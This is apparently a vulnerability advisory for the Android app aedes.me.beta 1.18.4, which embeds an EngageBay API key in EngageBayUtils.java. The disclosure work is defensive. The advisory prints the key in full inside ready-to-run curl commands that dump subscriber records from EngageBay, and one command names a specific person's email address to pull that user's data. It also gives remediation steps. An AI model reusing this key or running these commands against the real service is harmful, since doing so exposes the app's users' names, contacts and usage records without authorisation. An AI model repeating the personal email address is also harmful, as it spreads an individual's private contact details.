In the Android application aedes.me.beta version 1.18.4, a hardcoded EngageBay API key was discovered in the source fileĀ aedes/me/beta/utils/EngageBayUtils.java. An attacker can extract this key through reverse engineering and directly call EngageBay APIs to obtain sensitive user information, including but not limited to names, email addresses, phone numbers, app version, usage behavior (such as report generation records and tags), and other custom fields.
aedes/me/beta/utils/EngageBayUtils.java
Interact with EngageBay APIs to retrieve all user information:
curl -v -X POST "<https://app.engagebay.com/dev/api/panel/subscribers?limit=1>" \\
-H "Authorization: vipkirbpkaqcpu4667s087dcpd" \\
-H "Accept: application/json" \\
-H "Content-Type: application/json" \\
-d '{}'
Filter the user's data by email to obtain all sensitive information of that user
curl -v -X GET "[<https://app.engagebay.com/dev/api/panel/subscribers/contact-by-email/claudio.costanza86@gmail.com>](<https://app.engagebay.com/dev/api/panel/subscribers/contact-by-email/claudio.costanza86@gmail.com>)" \\
-H "Authorization: vipkirbpkaqcpu4667s087dcpd" \\
-H "Accept: application/json"
Remove the hardcoded API key from the APK, immediately revoke and rotate the exposed key in EngageBay, and move all API calls to a secure backend server instead of calling them directly from the client.
An attacker can extract the exposed API key and directly access EngageBay APIs to retrieve sensitive user data at scale, including personal information and usage records. This may lead to large-scale data leakage, privacy violations, regulatory compliance risks, and reputational damage to the application and its users.